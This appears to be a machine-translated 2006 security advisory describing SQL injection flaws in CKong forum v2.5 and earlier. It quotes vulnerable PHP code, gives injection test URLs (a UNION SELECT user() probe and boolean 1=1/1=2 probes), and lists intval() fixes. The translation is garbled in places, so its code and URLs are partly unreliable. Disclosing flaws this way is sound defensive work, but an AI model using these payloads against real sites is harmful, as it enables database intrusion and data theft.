Heart empty Forum(CKong) v2. 5 SQL injection vulnerability-vulnerability warning-the black bar safety net

2006-10-05T00:00:00
ID MYHACK58:62200612124
Type myhack58
Reporter 佚名
Modified 2006-10-05T00:00:00

Description

Program: heart empty Forum(CKong) Version:<=2.5 Type: sql injection

Vulnerability analysis

1, The post.php

|

<? require_once("include/config.inc.php"); require_once('include/functions.inc.php'); $fid=intval($fid); $tid=intval($tid); $pid=intval($pid);

.........

if(!$ C_errormsg) { if($postid) { $sql='select post_content,post_date,user_name from '. TAB_POST.' where post_id='.$ postid; $result=$db->sql_query($sql); $rows=$db->sql_fetchrow($result); $qcontent=preg_replace("/\quote\\ [\/quote\]/is","",$rows['post_content']); $qtime=date("Y-n-j G:i",$rows['post_date']); $articlecontent='

! References the reference content

References'.$ rows['user_name'].' To'.$ qtime." Articles published: \n".$ qcontent."

\n"; } .......


The variable$postid the filter is not strict lead to sql injection attacks, the test is as follows:

http://www.xxxx.cn/bbs/post.php?tid=988&postid=6 1 5 7%20and%2 0 1=2%20union%20select%20user(),2,1


2, the msgbox.php

< ? ......... }elseif($action=='read') { $sql="select msg_id from ". TAB_MSG." where user_name='".$ _SESSION['username']."' and msg_id>$msgid and msg_kind='$kind' order by msg_id limit 1"; $result=$db->sql_query($sql); $rows=$db->sql_fetchrow($result); $nextmsgid=$rows['msg_id']; ..........


The variable$msgid the filter is not strict lead to sql injection attacks, the test is as follows:

http://www.xxxx.cn/bbs/msgbox.php?action=read&msgid=3 6 1%20and%2 0 1=1 http://www.xxxx.cn/bbs/msgbox.php?action=read&msgid=3 6 1%20and%2 0 1=2


Bug fixes

1, The$postid=intval($postid); 2, the$msgid=intval($msgid);